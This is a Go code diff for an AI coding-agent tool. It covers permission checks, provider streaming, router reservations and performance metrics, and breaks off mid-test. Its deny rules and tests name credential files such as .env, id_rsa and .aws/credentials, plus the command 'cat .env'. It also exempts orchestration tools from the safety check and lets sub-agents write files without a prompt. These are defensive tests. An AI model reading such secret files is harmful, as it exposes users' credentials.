decision = retryDecision // adopt new reservation on retry
return s, err
}
return e.cfg.Provider.Stream(ctx, req)
})
@@ -111,20 +128,30 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
// Try reactive compaction on 413 (request too large)
s, err = e.handleRequestTooLarge(ctx, err, req)
if err != nil {
decision.Rollback()
return nil, fmt.Errorf("provider stream: %w", err)
}
}
}
// Consume stream, forwarding events to callback
// Consume stream, forwarding events to callback.
// Track TTFT and stream duration for arm performance metrics.
acc := stream.NewAccumulator()
var stopReason message.StopReason
var model string
streamStart := time.Now()
var firstTokenAt time.Time
for s.Next() {
evt := s.Current()
acc.Apply(evt)
// Record time of first text token for TTFT metric
if firstTokenAt.IsZero() && evt.Type == stream.EventTextDelta && evt.Text != "" {
firstTokenAt = time.Now()
}
// Capture stop reason and model from events
if evt.StopReason != "" {
stopReason = evt.StopReason
@@ -137,14 +164,28 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
cb(evt)
}
}
streamEnd := time.Now()
if err := s.Err(); err != nil {
s.Close()
decision.Rollback()
return nil, fmt.Errorf("stream error: %w", err)
}
s.Close()
// Build response
resp := acc.Response(stopReason, model)
// Commit pool reservation and record perf metrics for this round.
actualTokens := int(resp.Usage.InputTokens + resp.Usage.OutputTokens)
decision.Commit(actualTokens)
if decision.Arm != nil && !firstTokenAt.IsZero() {
decision.Arm.Perf.Update(
firstTokenAt.Sub(streamStart),
int(resp.Usage.OutputTokens),
streamEnd.Sub(streamStart),
)
}
turn.Usage.Add(resp.Usage)
turn.Messages = append(turn.Messages, resp.Message)
e.history = append(e.history, resp.Message)
@@ -152,7 +193,14 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
// Track in context window and check for compaction
if e.cfg.Context != nil {
e.cfg.Context.Append(resp.Message, resp.Usage)
e.cfg.Context.AppendMessage(resp.Message)
// Set tracker to the provider-reported context size (InputTokens = full context
// as sent this round). This avoids double-counting InputTokens across rounds.
if resp.Usage.InputTokens > 0 {
e.cfg.Context.Tracker().Set(resp.Usage.InputTokens + resp.Usage.OutputTokens)
} else {
e.cfg.Context.Tracker().Add(message.Usage{OutputTokens: resp.Usage.OutputTokens})
}
if compacted, err := e.cfg.Context.CompactIfNeeded(); err != nil {
e.logger.Error("context compaction failed", "error", err)
} else if compacted {
@@ -169,9 +217,19 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
// Decide next action
switch resp.StopReason {
case message.StopEndTurn, message.StopMaxTokens, message.StopSequence:
case message.StopEndTurn, message.StopSequence:
return turn, nil
case message.StopMaxTokens:
// Model hit its output token budget mid-response. Inject a continue prompt
// and re-query so the response is completed rather than silently truncated.
contMsg := message.NewUserText("Continue from where you left off.")
e.history = append(e.history, contMsg)
if e.cfg.Context != nil {
e.cfg.Context.AppendMessage(contMsg)
}
// Continue loop — next round will resume generation
case message.StopToolUse:
results, err := e.executeTools(ctx, resp.Message.ToolCalls(), cb)
if err != nil {
@@ -180,6 +238,9 @@ func (e *Engine) runLoop(ctx context.Context, cb Callback) (*Turn, error) {
toolMsg := message.NewToolResults(results...)
turn.Messages = append(turn.Messages, toolMsg)
e.history = append(e.history, toolMsg)
if e.cfg.Context != nil {
e.cfg.Context.AppendMessage(toolMsg)
}
// Continue loop — re-query provider with tool results
default:
@@ -205,12 +266,15 @@ func (e *Engine) buildRequest(ctx context.Context) provider.Request {
Model: e.cfg.Model,
SystemPrompt: systemPrompt,
Messages: messages,
ToolChoice: e.turnOpts.ToolChoice,
}
// Only include tools if the model supports them
// Only include tools if the model supports them.
// When Router is active, skip capability gating — the router selects the arm
// and already knows its capabilities. Gating here would use the wrong provider.
caps := e.resolveCapabilities(ctx)
if caps == nil || caps.ToolUse {
// nil caps = unknown model, include tools optimistically
if e.cfg.Router != nil || caps == nil || caps.ToolUse {
// Router active, nil caps (unknown model), or model supports tools
for _, t := range e.cfg.Tools.All() {
// Skip deferred tools until the model requests them
if dt, ok := t.(tool.DeferrableTool); ok && dt.ShouldDefer() && !e.activatedTools[t.Name()] {
@@ -352,10 +416,11 @@ func (e *Engine) executeSingleTool(ctx context.Context, call message.ToolCall, t
}
func truncate(s string, maxLen int) string {
if len(s) <= maxLen {
runes := []rune(s)
if len(runes) <= maxLen {
return s
}
return s[:maxLen] + "..."
return string(runes[:maxLen]) + "..."
}
// handleRequestTooLarge attempts compaction on 413 and retries once.
@@ -387,7 +452,7 @@ func (e *Engine) handleRequestTooLarge(ctx context.Context, origErr error, req p
}
}
task := router.ClassifyTask(prompt)
task.EstimatedTokens = 4000
task.EstimatedTokens = int(gnomactx.EstimateTokens(prompt))
s, _, err := e.cfg.Router.Stream(ctx, task, req)
return s, err
}
@@ -441,12 +506,3 @@ func (e *Engine) retryOnTransient(ctx context.Context, firstErr error, fn func()
return nil, firstErr
}
// toolDefFromTool converts a tool.Tool to provider.ToolDefinition.
// Unused currently but kept for reference when building tool definitions dynamically.
func toolDefFromJSON(name, description string, params json.RawMessage) provider.ToolDefinition {
return provider.ToolDefinition{
Name: name,
Description: description,
Parameters: params,
}
}

View File

@@ -6,6 +6,7 @@ import (
"errors"
"fmt"
"strings"
"sync"
)
var ErrDenied = errors.New("permission denied")
@@ -31,6 +32,7 @@ type ToolInfo struct {
// 5. Mode-specific behavior
// 6. Prompt user if needed
type Checker struct {
mu sync.RWMutex
mode Mode
rules []Rule
promptFn PromptFunc
@@ -53,22 +55,47 @@ func NewChecker(mode Mode, rules []Rule, promptFn PromptFunc) *Checker {
// SetPromptFunc replaces the prompt function (e.g., switching from pipe to TUI prompt).
func (c *Checker) SetPromptFunc(fn PromptFunc) {
c.mu.Lock()
defer c.mu.Unlock()
c.promptFn = fn
}
// SetMode changes the active permission mode.
func (c *Checker) SetMode(mode Mode) {
c.mu.Lock()
defer c.mu.Unlock()
c.mode = mode
}
// Mode returns the current permission mode.
func (c *Checker) Mode() Mode {
c.mu.RLock()
defer c.mu.RUnlock()
return c.mode
}
// WithDenyPrompt returns a new Checker with the same mode and rules but a nil prompt
// function. When a tool would normally require prompting, it is auto-denied. Used for
// elf engines where there is no TUI to prompt.
func (c *Checker) WithDenyPrompt() *Checker {
c.mu.RLock()
defer c.mu.RUnlock()
return &Checker{
mode: c.mode,
rules: c.rules,
promptFn: nil,
safetyDenyPatterns: c.safetyDenyPatterns,
}
}
// Check evaluates whether a tool call is permitted.
// Returns nil if allowed, ErrDenied if denied.
func (c *Checker) Check(ctx context.Context, info ToolInfo, args json.RawMessage) error {
c.mu.RLock()
mode := c.mode
promptFn := c.promptFn
c.mu.RUnlock()
// Step 1: Rule-based deny gates (bypass-immune)
if c.matchesRule(info.Name, args, ActionDeny) {
return fmt.Errorf("%w: deny rule matched for %s", ErrDenied, info.Name)
@@ -87,7 +114,7 @@ func (c *Checker) Check(ctx context.Context, info ToolInfo, args json.RawMessage
}
// Step 3: Mode-based bypass
if c.mode == ModeBypass {
if mode == ModeBypass {
return nil
}
@@ -97,7 +124,7 @@ func (c *Checker) Check(ctx context.Context, info ToolInfo, args json.RawMessage
}
// Step 5: Mode-specific behavior
switch c.mode {
switch mode {
case ModeDeny:
return fmt.Errorf("%w: deny mode, no allow rule for %s", ErrDenied, info.Name)
@@ -128,8 +155,24 @@ func (c *Checker) Check(ctx context.Context, info ToolInfo, args json.RawMessage
// Always prompt
}
// Step 6: Prompt user
return c.prompt(ctx, info.Name, args)
// Step 6: Prompt user (using snapshot of promptFn taken before lock release)
if promptFn == nil {
// No prompt handler (e.g. elf sub-agent): auto-allow non-destructive fs
// operations so elfs can write files in auto/acceptEdits modes. Deny
// everything else that would normally require human approval.
if strings.HasPrefix(info.Name, "fs.") && !info.IsDestructive {
return nil
}
return fmt.Errorf("%w: no prompt handler for %s", ErrDenied, info.Name)
}
approved, err := promptFn(ctx, info.Name, args)
if err != nil {
return fmt.Errorf("permission prompt: %w", err)
}
if !approved {
return fmt.Errorf("%w: user denied %s", ErrDenied, info.Name)
}
return nil
}
func (c *Checker) matchesRule(toolName string, args json.RawMessage, action Action) bool {
@@ -152,9 +195,26 @@ func (c *Checker) matchesRule(toolName string, args json.RawMessage, action Acti
}
func (c *Checker) safetyCheck(toolName string, args json.RawMessage) error {
argsStr := string(args)
// Orchestration tools (spawn_elfs, agent) carry elf PROMPTS as args — arbitrary
// instruction text that may legitimately mention .env, credentials, etc.
// Security is enforced inside each spawned elf when it actually accesses files.
if toolName == "spawn_elfs" || toolName == "agent" {
return nil
}
// For fs.* tools, only check the path field — not content being written.
// Prevents false-positives when writing docs that reference .env, .ssh, etc.
checkStr := string(args)
if strings.HasPrefix(toolName, "fs.") {
var parsed struct {
Path string `json:"path"`
}
if err := json.Unmarshal(args, &parsed); err == nil && parsed.Path != "" {
checkStr = parsed.Path
}
}
for _, pattern := range c.safetyDenyPatterns {
if strings.Contains(argsStr, pattern) {
if strings.Contains(checkStr, pattern) {
return fmt.Errorf("%w: safety check blocked access to %q via %s", ErrDenied, pattern, toolName)
}
}
@@ -184,18 +244,3 @@ func (c *Checker) checkCompoundCommand(ctx context.Context, info ToolInfo, args
return nil
}
func (c *Checker) prompt(ctx context.Context, toolName string, args json.RawMessage) error {
if c.promptFn == nil {
// No prompt function — deny by default
return fmt.Errorf("%w: no prompt handler for %s", ErrDenied, toolName)
}
approved, err := c.promptFn(ctx, toolName, args)
if err != nil {
return fmt.Errorf("permission prompt: %w", err)
}
if !approved {
return fmt.Errorf("%w: user denied %s", ErrDenied, toolName)
}
return nil
}

View File

@@ -110,6 +110,30 @@ func TestChecker_AcceptEditsMode(t *testing.T) {
}
}
func TestChecker_ElfNilPrompt_FsWriteAllowed(t *testing.T) {
// Elfs use WithDenyPrompt (nil promptFn). Non-destructive fs ops must still
// be allowed so elfs can write files in auto/acceptEdits modes.
c := NewChecker(ModeAuto, nil, nil) // nil promptFn simulates elf checker
// Non-destructive fs.write: allowed
err := c.Check(context.Background(), ToolInfo{Name: "fs.write"}, json.RawMessage(`{"path":"AGENTS.md"}`))
if err != nil {
t.Errorf("elf should be able to write files: %v", err)
}
// Destructive fs op: denied
err = c.Check(context.Background(), ToolInfo{Name: "fs.delete", IsDestructive: true}, json.RawMessage(`{"path":"foo"}`))
if !errors.Is(err, ErrDenied) {
t.Error("destructive fs op should be denied without prompt handler")
}
// bash: denied
err = c.Check(context.Background(), ToolInfo{Name: "bash"}, json.RawMessage(`{"command":"echo hi"}`))
if !errors.Is(err, ErrDenied) {
t.Error("bash should be denied without prompt handler")
}
}
func TestChecker_AutoMode(t *testing.T) {
c := NewChecker(ModeAuto, nil, func(_ context.Context, _ string, _ json.RawMessage) (bool, error) {
return true, nil // approve prompt
@@ -148,23 +172,68 @@ func TestChecker_SafetyCheck(t *testing.T) {
// Safety checks are bypass-immune
c := NewChecker(ModeBypass, nil, nil)
tests := []struct {
name string
args string
blocked := []struct {
name string
toolName string
args string
}{
{"env file", `{"path":".env"}`},
{"git dir", `{"path":".git/config"}`},
{"ssh key", `{"path":"id_rsa"}`},
{"aws creds", `{"path":".aws/credentials"}`},
{"env file", "fs.read", `{"path":".env"}`},
{"git dir", "fs.read", `{"path":".git/config"}`},
{"ssh key", "fs.read", `{"path":"id_rsa"}`},
{"aws creds", "fs.read", `{"path":".aws/credentials"}`},
{"bash env", "bash", `{"command":"cat .env"}`},
}
for _, tt := range tests {
for _, tt := range blocked {
t.Run(tt.name, func(t *testing.T) {
err := c.Check(context.Background(), ToolInfo{Name: "fs.read"}, json.RawMessage(tt.args))
err := c.Check(context.Background(), ToolInfo{Name: tt.toolName}, json.RawMessage(tt.args))
if !errors.Is(err, ErrDenied) {
t.Errorf("safety check should block: %v", err)
}
})
}
// Writing a file whose *content* mentions .env (e.g. AGENTS.md docs) must not be blocked.
t.Run("env mention in content not blocked", func(t *testing.T) {
args := json.RawMessage(`{"path":"AGENTS.md","content":"Copy .env.example to .env and fill in the values."}`)
err := c.Check(context.Background(), ToolInfo{Name: "fs.write"}, args)
if err != nil {
t.Errorf("fs.write to safe path should not be blocked by content mention: %v", err)
}
})
}
func TestChecker_SafetyCheck_OrchestrationToolsExempt(t *testing.T) {
// spawn_elfs and agent carry elf PROMPT TEXT as args — arbitrary instruction
// text that may legitimately mention .env, credentials, etc.
// Security is enforced inside each spawned elf, not at the orchestration layer.
c := NewChecker(ModeBypass, nil, nil)
cases := []struct {
name string
toolName string
args string
}{
{"spawn_elfs with .env mention", "spawn_elfs", `{"tasks":[{"task":"check .env config","elf":"worker"}]}`},
{"spawn_elfs with credentials mention", "spawn_elfs", `{"tasks":[{"task":"read credentials file","elf":"worker"}]}`},
{"agent with .env mention", "agent", `{"prompt":"verify .env is configured correctly"}`},
{"agent with ssh mention", "agent", `{"prompt":"check .ssh/config for proxy settings"}`},
}
for _, tt := range cases {
t.Run(tt.name, func(t *testing.T) {
err := c.Check(context.Background(), ToolInfo{Name: tt.toolName}, json.RawMessage(tt.args))
if err != nil {
t.Errorf("orchestration tool %q should not be blocked by safety check: %v", tt.toolName, err)
}
})
}
// Non-orchestration tools with the same patterns are still blocked.
t.Run("bash with .env still blocked", func(t *testing.T) {
err := c.Check(context.Background(), ToolInfo{Name: "bash"}, json.RawMessage(`{"command":"cat .env"}`))
if !errors.Is(err, ErrDenied) {
t.Errorf("bash accessing .env should still be blocked: %v", err)
}
})
}
func TestChecker_CompoundCommand(t *testing.T) {
@@ -233,3 +302,26 @@ func TestChecker_SetMode(t *testing.T) {
t.Errorf("mode should be plan after SetMode")
}
}
func TestChecker_ConcurrentSetModeAndCheck(t *testing.T) {
// Verifies no data race between SetMode (TUI goroutine) and Check (engine goroutine).
// Run with: go test -race ./internal/permission/...
c := NewChecker(ModeDefault, nil, nil)
ctx := context.Background()
info := ToolInfo{Name: "bash", IsReadOnly: true}
args := json.RawMessage(`{}`)
done := make(chan struct{})
go func() {
defer close(done)
for i := 0; i < 1000; i++ {
c.SetMode(ModeAuto)
c.SetMode(ModeDefault)
}
}()
for i := 0; i < 1000; i++ {
c.Check(ctx, info, args) //nolint:errcheck
}
<-done
}

View File

@@ -0,0 +1,57 @@
package provider
import (
"context"
"sync"
"somegit.dev/Owlibou/gnoma/internal/stream"
)
// ConcurrentProvider wraps a Provider with a shared semaphore that limits the
// number of in-flight Stream calls. All engines sharing the same
// ConcurrentProvider instance share the same concurrency budget.
type ConcurrentProvider struct {
Provider
sem chan struct{}
}
// WithConcurrency wraps p so that at most max Stream calls can be in-flight
// simultaneously. If max <= 0, p is returned unwrapped.
func WithConcurrency(p Provider, max int) Provider {
if max <= 0 {
return p
}
sem := make(chan struct{}, max)
for range max {
sem <- struct{}{}
}
return &ConcurrentProvider{Provider: p, sem: sem}
}
// Stream acquires a concurrency slot, calls the inner provider, and returns a
// stream that releases the slot when Close is called.
func (cp *ConcurrentProvider) Stream(ctx context.Context, req Request) (stream.Stream, error) {
select {
case <-cp.sem:
case <-ctx.Done():
return nil, ctx.Err()
}
s, err := cp.Provider.Stream(ctx, req)
if err != nil {
cp.sem <- struct{}{}
return nil, err
}
return &semStream{Stream: s, release: func() { cp.sem <- struct{}{} }}, nil
}
// semStream wraps a stream.Stream to release a semaphore slot on Close.
type semStream struct {
stream.Stream
release func()
once sync.Once
}
func (s *semStream) Close() error {
s.once.Do(s.release)
return s.Stream.Close()
}

View File

@@ -15,13 +15,20 @@ const defaultModel = "gpt-4o"
// Provider implements provider.Provider for the OpenAI API.
type Provider struct {
client *oai.Client
name string
model string
client *oai.Client
name string
model string
streamOpts []option.RequestOption // injected per-request (e.g. think:false for Ollama)
}
// New creates an OpenAI provider from config.
func New(cfg provider.ProviderConfig) (provider.Provider, error) {
return NewWithStreamOptions(cfg, nil)
}
// NewWithStreamOptions creates an OpenAI provider with extra per-request stream options.
// Use this for Ollama/llama.cpp adapters that need non-standard body fields.
func NewWithStreamOptions(cfg provider.ProviderConfig, streamOpts []option.RequestOption) (provider.Provider, error) {
if cfg.APIKey == "" {
return nil, fmt.Errorf("openai: api key required")
}
@@ -41,9 +48,10 @@ func New(cfg provider.ProviderConfig) (provider.Provider, error) {
}
return &Provider{
client: &client,
name: "openai",
model: model,
client: &client,
name: "openai",
model: model,
streamOpts: streamOpts,
}, nil
}
@@ -57,7 +65,7 @@ func (p *Provider) Stream(ctx context.Context, req provider.Request) (stream.Str
params := translateRequest(req)
params.Model = model
raw := p.client.Chat.Completions.NewStreaming(ctx, params)
raw := p.client.Chat.Completions.NewStreaming(ctx, params, p.streamOpts...)
return newOpenAIStream(raw), nil
}

View File

@@ -25,9 +25,10 @@ type openaiStream struct {
}
type toolCallState struct {
id string
name string
args string
id string
name string
args string
argsComplete bool // true when args arrived in the initial chunk; skip subsequent deltas
}
func newOpenAIStream(raw *ssestream.Stream[oai.ChatCompletionChunk]) *openaiStream {
@@ -74,9 +75,10 @@ func (s *openaiStream) Next() bool {
if !ok {
// New tool call — capture initial arguments too
existing = &toolCallState{
id: tc.ID,
name: tc.Function.Name,
args: tc.Function.Arguments,
id: tc.ID,
name: tc.Function.Name,
args: tc.Function.Arguments,
argsComplete: tc.Function.Arguments != "",
}
s.toolCalls[tc.Index] = existing
s.hadToolCalls = true
@@ -91,8 +93,11 @@ func (s *openaiStream) Next() bool {
}
}
// Accumulate arguments (subsequent chunks)
if tc.Function.Arguments != "" && ok {
// Accumulate arguments (subsequent chunks).
// Skip if args were already provided in the initial chunk — some providers
// (e.g. Ollama) send complete args in the name chunk and then repeat them
// as a delta, which would cause doubled JSON and unmarshal failures.
if tc.Function.Arguments != "" && ok && !existing.argsComplete {
existing.args += tc.Function.Arguments
s.cur = stream.Event{
Type: stream.EventToolCallDelta,
@@ -113,6 +118,29 @@ func (s *openaiStream) Next() bool {
}
return true
}
// Ollama thinking content — non-standard "thinking" or "reasoning" field on the delta.
// Ollama uses "reasoning"; some other servers use "thinking".
// The openai-go struct drops unknown fields, so we read the raw JSON directly.
if raw := delta.RawJSON(); raw != "" {
var extra struct {
Thinking string `json:"thinking"`
Reasoning string `json:"reasoning"`
}
if json.Unmarshal([]byte(raw), &extra) == nil {
text := extra.Thinking
if text == "" {
text = extra.Reasoning
}
if text != "" {
s.cur = stream.Event{
Type: stream.EventThinkingDelta,
Text: text,
}
return true
}
}
}
}
// Stream ended — flush tool call Done events, then emit stop

View File

@@ -20,6 +20,10 @@ func unsanitizeToolName(name string) string {
if strings.HasPrefix(name, "fs_") {
return "fs." + name[3:]
}
// Some models (e.g. gemma4 via Ollama) use "fs:grep" instead of "fs_grep"
if strings.HasPrefix(name, "fs:") {
return "fs." + name[3:]
}
return name
}
@@ -127,6 +131,12 @@ func translateRequest(req provider.Request) oai.ChatCompletionNewParams {
IncludeUsage: param.NewOpt(true),
}
if req.ToolChoice != "" && len(params.Tools) > 0 {
params.ToolChoice = oai.ChatCompletionToolChoiceOptionUnionParam{
OfAuto: param.NewOpt(string(req.ToolChoice)),
}
}
return params
}

View File

@@ -8,6 +8,15 @@ import (
"somegit.dev/Owlibou/gnoma/internal/stream"
)
// ToolChoiceMode controls how the model selects tools.
type ToolChoiceMode string
const (
ToolChoiceAuto ToolChoiceMode = "auto"
ToolChoiceRequired ToolChoiceMode = "required"
ToolChoiceNone ToolChoiceMode = "none"
)
// Request encapsulates everything needed for a single LLM API call.
type Request struct {
Model string
@@ -21,6 +30,7 @@ type Request struct {
StopSequences []string
Thinking *ThinkingConfig
ResponseFormat *ResponseFormat
ToolChoice ToolChoiceMode // "" = provider default (auto)
}
// ToolDefinition is the provider-agnostic tool schema.

View File

@@ -1,5 +1,7 @@
package provider
import "math"
// RateLimits describes the rate limits for a provider+model pair.
// Zero values mean "no limit" or "unknown".
type RateLimits struct {
@@ -13,6 +15,31 @@ type RateLimits struct {
SpendCap float64 // monthly spend cap in provider currency
}
// MaxConcurrent returns the maximum number of concurrent in-flight requests
// that this rate limit allows. Returns 0 when there is no meaningful concurrency
// constraint (provider has high or unknown limits).
func (rl RateLimits) MaxConcurrent() int {
if rl.RPS > 0 {
n := int(math.Ceil(rl.RPS))
if n < 1 {
n = 1
}
return n
}
if rl.RPM > 0 {
// Allow 1 concurrent slot per 30 RPM (conservative heuristic).
n := rl.RPM / 30
if n < 1 {
n = 1
}
if n > 16 {
n = 16
}
return n
}
return 0
}
// ProviderDefaults holds default rate limits keyed by model glob.
// The special key "*" matches any model not explicitly listed.
type ProviderDefaults struct {

View File

@@ -1,6 +1,9 @@
package router
import (
"sync"
"time"
"somegit.dev/Owlibou/gnoma/internal/provider"
)
@@ -19,6 +22,9 @@ type Arm struct {
// Cost per 1k tokens (EUR, estimated)
CostPer1kInput float64
CostPer1kOutput float64
// Live performance metrics, updated after each completed request.
Perf ArmPerf
}
// NewArmID creates an arm ID from provider name and model.
@@ -39,9 +45,38 @@ func (a *Arm) SupportsTools() bool {
return a.Capabilities.ToolUse
}
// ArmPerf holds live performance metrics for an arm.
// perfAlpha is the EMA smoothing factor for ArmPerf updates (0.3 = ~3-sample memory).
const perfAlpha = 0.3
// ArmPerf tracks live performance metrics using an exponential moving average.
// Updated after each completed stream. Safe for concurrent use.
type ArmPerf struct {
TTFT_P50_ms float64 // time to first token, p50
TTFT_P95_ms float64 // time to first token, p95
ToksPerSec float64 // tokens per second throughput
mu sync.Mutex
TTFTMs float64 // time to first token, EMA in milliseconds
ToksPerSec float64 // output throughput, EMA in tokens/second
Samples int // total observations recorded
}
// Update records a single observation into the EMA.
// ttft: elapsed time from stream start to first text token.
// outputTokens: tokens generated in this response.
// streamDuration: total time the stream was active (first call to last event).
func (p *ArmPerf) Update(ttft time.Duration, outputTokens int, streamDuration time.Duration) {
p.mu.Lock()
defer p.mu.Unlock()
ttftMs := float64(ttft.Milliseconds())
var tps float64
if streamDuration > 0 {
tps = float64(outputTokens) / streamDuration.Seconds()
}
if p.Samples == 0 {
p.TTFTMs = ttftMs
p.ToksPerSec = tps
} else {
p.TTFTMs = perfAlpha*ttftMs + (1-perfAlpha)*p.TTFTMs
p.ToksPerSec = perfAlpha*tps + (1-perfAlpha)*p.ToksPerSec
}
p.Samples++
}

View File

@@ -6,6 +6,7 @@ import (
"fmt"
"log/slog"
"net/http"
"strings"
"time"
"somegit.dev/Owlibou/gnoma/internal/provider"
@@ -15,10 +16,37 @@ const discoveryTimeout = 5 * time.Second
// DiscoveredModel represents a model found via discovery.
type DiscoveredModel struct {
ID string
Name string
Provider string // "ollama" or "llamacpp"
Size int64 // bytes, if available
ID string
Name string
Provider string // "ollama" or "llamacpp"
Size int64 // bytes, if available
SupportsTools bool // whether the model supports function/tool calling
ContextSize int // context window in tokens (0 = unknown, use default)
}
// toolSupportedModelPrefixes lists known model families that support tool/function calling.
// This is a conservative allowlist — unknown models default to no tool support.
var toolSupportedModelPrefixes = []string{
"mistral", "mixtral", "codestral",
"llama3", "llama-3",
"qwen2", "qwen-2", "qwen2.5",
"command-r",
"functionary",
"hermes",
"firefunction",
"nexusraven",
"groq-tool",
}
// inferToolSupport returns true if the model name suggests tool/function calling support.
func inferToolSupport(modelName string) bool {
lower := strings.ToLower(modelName)
for _, prefix := range toolSupportedModelPrefixes {
if strings.Contains(lower, prefix) {
return true
}
}
return false
}
// DiscoverOllama polls the local Ollama instance for available models.
@@ -62,10 +90,12 @@ func DiscoverOllama(ctx context.Context, baseURL string) ([]DiscoveredModel, err
var models []DiscoveredModel
for _, m := range result.Models {
models = append(models, DiscoveredModel{
ID: m.Name,
Name: m.Name,
Provider: "ollama",
Size: m.Size,
ID: m.Name,
Name: m.Name,
Provider: "ollama",
Size: m.Size,
SupportsTools: inferToolSupport(m.Name),
ContextSize: 32768, // conservative default; Ollama /api/show can refine this
})
}
return models, nil
@@ -107,9 +137,11 @@ func DiscoverLlamaCpp(ctx context.Context, baseURL string) ([]DiscoveredModel, e
var models []DiscoveredModel
for _, m := range result.Data {
models = append(models, DiscoveredModel{
ID: m.ID,
Name: m.ID,
Provider: "llamacpp",
ID: m.ID,
Name: m.ID,
Provider: "llamacpp",
SupportsTools: inferToolSupport(m.ID),
ContextSize: 8192, // llama.cpp default; --ctx-size configurable
})
}
return models, nil
@@ -208,8 +240,14 @@ func RegisterDiscoveredModels(r *Router, models []DiscoveredModel, providerFacto
ModelName: m.ID,
IsLocal: true,
Capabilities: provider.Capabilities{
ToolUse: true, // assume tool support, will fail gracefully if not
ContextWindow: 32768,
// Conservative default: don't assume tool support.
// Many small local models (phi, tinyllama, etc.) don't support
// function calling and will produce confused output if selected
// for tool-requiring tasks. Larger known models (mistral, llama3,
// qwen2.5-coder) support tools. Callers can update the arm's
// Capabilities after probing the model template.
ToolUse: m.SupportsTools,
ContextWindow: m.ContextSize,
},
})
}

View File

@@ -94,13 +94,27 @@ func (r *Router) Select(task Task) RoutingDecision {
return RoutingDecision{Error: fmt.Errorf("selection failed")}
}
// Reserve capacity on all pools so concurrent selects don't overcommit.
// If a reservation fails (race between CanAfford and Reserve), return an error.
var reservations []*Reservation
for _, pool := range best.Pools {
res, ok := pool.Reserve(best.ID, task.EstimatedTokens)
if !ok {
for _, prev := range reservations {
prev.Rollback()
}
return RoutingDecision{Error: fmt.Errorf("pool capacity exhausted for arm %s", best.ID)}
}
reservations = append(reservations, res)
}
r.logger.Debug("arm selected",
"arm", best.ID,
"task_type", task.Type,
"complexity", task.ComplexityScore,
)
return RoutingDecision{Strategy: StrategySingleArm, Arm: best}
return RoutingDecision{Strategy: StrategySingleArm, Arm: best, reservations: reservations}
}
// SetLocalOnly constrains routing to local arms only (for incognito mode).
@@ -190,19 +204,21 @@ func (r *Router) RegisterProvider(ctx context.Context, prov provider.Provider, i
}
}
// Stream is a convenience that selects an arm and streams from it.
func (r *Router) Stream(ctx context.Context, task Task, req provider.Request) (stream.Stream, *Arm, error) {
// Stream selects an arm and streams from it, returning the RoutingDecision so the
// caller can commit or rollback pool reservations when the request completes.
// Call decision.Commit(actualTokens) on success, decision.Rollback() on failure.
func (r *Router) Stream(ctx context.Context, task Task, req provider.Request) (stream.Stream, RoutingDecision, error) {
decision := r.Select(task)
if decision.Error != nil {
return nil, nil, decision.Error
return nil, decision, decision.Error
}
arm := decision.Arm
req.Model = arm.ModelName
req.Model = decision.Arm.ModelName
s, err := arm.Provider.Stream(ctx, req)
s, err := decision.Arm.Provider.Stream(ctx, req)
if err != nil {
return nil, arm, err
decision.Rollback()
return nil, decision, err
}
return s, arm, nil
return s, decision, nil
}

View File

@@ -303,3 +303,199 @@ func TestRouter_SelectForcedNotFound(t *testing.T) {
t.Error("should error when forced arm not found")
}
}
// --- Gap A: Pool Reservations ---
func TestRoutingDecision_CommitReleasesReservation(t *testing.T) {
pool := &LimitPool{
TotalLimit: 1000,
ArmRates: map[ArmID]float64{"a/model": 1.0},
ScarcityK: 2,
}
arm := &Arm{
ID: "a/model",
Capabilities: provider.Capabilities{ToolUse: true},
Pools: []*LimitPool{pool},
}
r := New(Config{})
r.RegisterArm(arm)
task := Task{Type: TaskGeneration, RequiresTools: true, EstimatedTokens: 500, Priority: PriorityNormal}
decision := r.Select(task)
if decision.Error != nil {
t.Fatalf("Select: %v", decision.Error)
}
// After Select: tokens should be reserved
if pool.Reserved == 0 {
t.Error("Select should reserve pool capacity")
}
// After Commit: reserved released, used incremented
decision.Commit(400)
if pool.Reserved != 0 {
t.Errorf("Reserved = %f after Commit, want 0", pool.Reserved)
}
if pool.Used == 0 {
t.Error("Used should be non-zero after Commit")
}
}
func TestRoutingDecision_RollbackReleasesReservation(t *testing.T) {
pool := &LimitPool{
TotalLimit: 1000,
ArmRates: map[ArmID]float64{"a/model": 1.0},
ScarcityK: 2,
}
arm := &Arm{
ID: "a/model",
Capabilities: provider.Capabilities{ToolUse: true},
Pools: []*LimitPool{pool},
}
r := New(Config{})
r.RegisterArm(arm)
task := Task{Type: TaskGeneration, RequiresTools: true, EstimatedTokens: 500, Priority: PriorityNormal}
decision := r.Select(task)
if decision.Error != nil {
t.Fatalf("Select: %v", decision.Error)
}
decision.Rollback()
if pool.Reserved != 0 {
t.Errorf("Reserved = %f after Rollback, want 0", pool.Reserved)
}
if pool.Used != 0 {
t.Errorf("Used = %f after Rollback, want 0", pool.Used)
}
}
func TestSelect_ConcurrentReservationPreventsOvercommit(t *testing.T) {
// Pool with very limited capacity: only 1 request can fit
pool := &LimitPool{
TotalLimit: 10,
ArmRates: map[ArmID]float64{"a/model": 1.0},
ScarcityK: 2,
}
arm := &Arm{
ID: "a/model",
Capabilities: provider.Capabilities{ToolUse: true},
Pools: []*LimitPool{pool},
}
r := New(Config{})
r.RegisterArm(arm)
task := Task{Type: TaskGeneration, RequiresTools: true, EstimatedTokens: 8000, Priority: PriorityNormal}
// First select should succeed and reserve
d1 := r.Select(task)
// Second concurrent select should fail — capacity reserved by first
d2 := r.Select(task)
if d1.Error != nil && d2.Error != nil {
t.Error("at least one selection should succeed")
}
if d1.Error == nil && d2.Error == nil {
t.Error("second selection should fail: pool overcommit prevented")
}
// Cleanup
d1.Rollback()
d2.Rollback()
}
// --- Gap B: ArmPerf ---
func TestArmPerf_Update_FirstSample(t *testing.T) {
var p ArmPerf
p.Update(50*time.Millisecond, 100, 2*time.Second)
if p.Samples != 1 {
t.Errorf("Samples = %d, want 1", p.Samples)
}
if p.TTFTMs != 50 {
t.Errorf("TTFTMs = %f, want 50", p.TTFTMs)
}
if p.ToksPerSec != 50 { // 100 tokens / 2s
t.Errorf("ToksPerSec = %f, want 50", p.ToksPerSec)
}
}
func TestArmPerf_Update_EMA(t *testing.T) {
var p ArmPerf
p.Update(100*time.Millisecond, 100, time.Second)
p.Update(50*time.Millisecond, 100, time.Second) // faster second response
if p.Samples != 2 {
t.Errorf("Samples = %d, want 2", p.Samples)
}
// EMA: new = 0.3*50 + 0.7*100 = 85
